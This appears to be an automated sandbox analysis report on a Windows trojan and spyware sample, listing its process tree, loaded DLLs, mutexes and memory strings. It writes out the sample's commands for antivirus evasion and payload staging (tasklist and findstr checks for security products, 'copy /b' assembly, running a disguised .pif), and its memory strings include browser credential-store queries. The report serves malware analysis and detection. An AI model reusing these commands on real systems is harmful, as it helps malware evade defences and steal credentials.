Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4

Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: String function: 00A6EAB8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: String function: 00A6EAA3 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: String function: 00A69510 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: String function: 00A8A1F3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: String function: 00A6EDA2 appears 158 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: String function: 00A6F3E0 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: String function: 00A68CF0 appears 47 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: String function: 00CFEAB8 appears 35 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: String function: 00CFEDA2 appears 81 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: String function: 00CFF3E0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: String function: 00CF9510 appears 123 times

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 984

Source: J2NWKU2oJi.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 20.3.OpenWith.exe.1bd7775aad0.12.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.5.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.13.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.9.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.27.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.15.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.7.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.14.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@33/22@1/3

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

0_2_0040352D

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040498A

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Spectrum

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
Source: C:\Windows\SysWOW64\dialer.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Mutant created: \Sessions\1\BaseNamedObjects\c3c217c6aa232801b551c5b797f47c88

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

File created: C:\Users\user\AppData\Local\Temp\nsdB815.tmp

Jump to behavior

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat

Source: J2NWKU2oJi.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 00000014.00000003.2377886629.000001BD77981000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378135994.000001BD77940000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2377638858.000001BD77981000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: J2NWKU2oJi.exe	Virustotal: Detection: 20%
Source: J2NWKU2oJi.exe	ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

File read: C:\Users\user\Desktop\J2NWKU2oJi.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\J2NWKU2oJi.exe "C:\Users\user\Desktop\J2NWKU2oJi.exe"
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 331463
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AdditionUnitKoreanLn" Remembered
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Pitch + Twelve + Conditions + Venture + Pushing 331463\Q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 331463\Pleasure.pif 331463\Q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 984
Source: C:\Windows\SysWOW64\dialer.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Yuem.exe "C:\Users\user\AppData\Local\Microsoft\Yuem.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe "C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 331463	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AdditionUnitKoreanLn" Remembered	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Pitch + Twelve + Conditions + Venture + Pushing 331463\Q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 331463\Pleasure.pif 331463\Q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Yuem.exe "C:\Users\user\AppData\Local\Microsoft\Yuem.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe "C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe"	Jump to behavior

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: tapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: apphelp.dll	Jump to behavior
